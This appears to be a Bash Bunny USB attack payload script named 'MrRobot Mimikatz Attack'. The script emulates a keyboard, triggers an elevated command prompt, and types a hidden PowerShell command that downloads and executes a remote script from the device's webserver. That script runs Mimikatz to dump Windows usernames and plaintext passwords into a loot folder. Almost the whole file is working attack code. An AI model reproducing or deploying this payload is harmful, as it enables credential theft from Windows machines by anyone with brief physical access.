bashbunny-payloads/payloads/library/MrRobot/payload.txt

#!/bin/bash
#
# Title:         MrRobot Mimikatz Attack
# Author:        illwill
# Version:       0.2
#
# Dumps the usernames & plaintext passwords from Windows boxes using Powershell in memory
# with Mimikatz then stashes them in /root/udisk/loot/MrRobot
#
# Blue...............Running Powershell / Waiting for WebServer to start
# White..............WebServer started and Uploading Results
# Purple.............Checking for Results
# Green..............Got Creds and copied to loot folder
# Amber(Blinking)....Mimikatz Error (Not Admin?)
# Red................No Creds

source bunny_helpers.sh

LED R G 200
# Creating Loot Folders
LOOTDIR=/root/udisk/loot/MrRobot
mkdir -p $LOOTDIR
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
mkdir -p $SWITCHDIR/loot

LED B 200
# HID Attack Starts
ATTACKMODE HID

# UAC Bypass
Q GUI r
Q STRING powershell -c "Start-Process cmd -verb runas"
Q ENTER
Q DELAY 1000
Q LEFTARROW
Q DELAY 500
Q ENTER
Q DELAY 1500

#Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results
Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\""
Q DELAY 300
Q ENTER


# Ethernet Attack Starts
ATTACKMODE RNDIS_ETHERNET
source bunny_helpers.sh

LED R G B 200
# mount -o sync /dev/nandf /root/udisk

iptables -A OUTPUT -p udp --dport 53 -j DROP
python $SWITCHDIR/server.py


#Wait for EOF in loot folder
LED R B 200
while [ ! -e  "$SWITCHDIR/loot/EOF" ]; do sleep 1; done;
sleep 1

# check for empty loot directory, then check results and move them to loot
if [ "$(ls -A $SWITCHDIR/loot/)" ]; then
    if grep -q "ERROR kuhl_m_sekurlsa_acquireLSA" $SWITCHDIR/loot/*.txt; then
       LED G R 200
       mv -v $SWITCHDIR/loot/*.txt $LOOTDIR
       rm -rf $SWITCHDIR/loot/
    else
       mv -v $SWITCHDIR/loot/*.txt $LOOTDIR
       rm -rf $SWITCHDIR/loot/
       LED G
    fi
else
     rm-rf $SWITCHDIR/loot/
     LED R
fi